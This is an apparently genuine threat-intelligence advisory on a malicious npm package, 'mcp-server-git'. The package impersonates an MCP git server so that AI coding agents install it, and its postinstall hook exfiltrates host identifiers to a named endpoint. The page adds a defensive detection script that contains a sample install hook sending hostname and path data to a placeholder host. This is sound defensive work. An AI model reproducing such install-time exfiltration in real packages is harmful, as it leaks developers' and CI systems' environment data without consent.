THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in mcp-server-git (npm)

mcp-server-git

Risk score

92

AI summary

Indexed incident for mcp-server-git (npm).

Description

package.json declares postinstall: node index.js. On every npm install, index.js (lines 14-29) reads os.hostname(), process.cwd(), os.platform(), the npm user-agent, and Node version, and POSTs them as JSON to the hardcoded endpoint https://npx-canary-log.vulnerable-live.workers.dev/log (index.js:16). The package name mcp-server-git impersonates the well-known Model Context Protocol git server (officially distributed under a different name); the README states the unscoped npm name was claimed specifically to intercept npx mcp-server-git invocations from AI coding agents and developer tooling. The combination of name impersonation and unconsented install-time exfiltration of internal hostnames and build paths to an author-controlled Cloudflare Worker constitutes a supply-chain attack on installers, regardless of the author's self-described 'canary research' framing — CI systems, developer workstations, and AI agents that resolve mcp-server-git will leak environment identifiers without consent.
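One way to triage a package for the pattern described above, written as an added example (not code from the advisory or from the package): it flags npm install-time lifecycle scripts and, for "node <file>" hooks, checks the target script for host-identifier reads combined with network egress. The function name auditPackage, the regex lists, and the sample manifest and source with its placeholder endpoint are assumptions constructed for illustration.

```javascript
// Lifecycle scripts that npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Host identifiers named in the advisory (heuristic patterns, assumed for this example).
const FINGERPRINT = {
  hostname: /\bos\.hostname\s*\(/,
  cwd: /\bprocess\.cwd\s*\(/,
  platform: /\bos\.platform\s*\(/,
  userAgent: /npm_config_user_agent/,
  nodeVersion: /\bprocess\.versions?\b/,
};
// Common Node egress calls (heuristic, not exhaustive).
const EGRESS = [/\bfetch\s*\(/, /\bhttps?\.request\s*\(/, /require\(\s*["'](?:node:)?https?["']\s*\)/];
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// manifest: parsed package.json; files: { relativePath: sourceText } taken from the tarball.
function auditPackage(manifest, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    const f = { hook, cmd, entry: null, fingerprint: [], egress: false, urls: [] };
    // Resolve "node <file>" hooks to the script they execute; other commands need manual review.
    const m = /^\s*node\s+(?:\.\/)?(\S+)/.exec(cmd);
    const src = m ? files[m[1]] : undefined;
    if (typeof src === "string") {
      f.entry = m[1];
      f.fingerprint = Object.keys(FINGERPRINT).filter((k) => FINGERPRINT[k].test(src));
      f.egress = EGRESS.some((re) => re.test(src));
      f.urls = src.match(URL_RE) || [];
    }
    // "high": the hook both reads host identifiers and can reach the network.
    f.severity = f.fingerprint.length > 0 && f.egress ? "high" : "review";
    findings.push(f);
  }
  return findings;
}

// Constructed sample shaped like the advisory's description (placeholder name and endpoint).
const SAMPLE_MANIFEST = { name: "example-pkg", version: "0.0.1", scripts: { postinstall: "node index.js" } };
const SAMPLE_FILES = { "index.js": [
  'const os = require("os");',
  'const body = JSON.stringify({ h: os.hostname(), d: process.cwd(), p: os.platform() });',
  'fetch("https://collector.example.invalid/log", { method: "POST", body });',
].join("\n") };

console.log(JSON.stringify(auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

Installing with npm's --ignore-scripts option keeps lifecycle hooks like this one from running at all, so the check above is best run against the unpacked tarball before any install.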

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
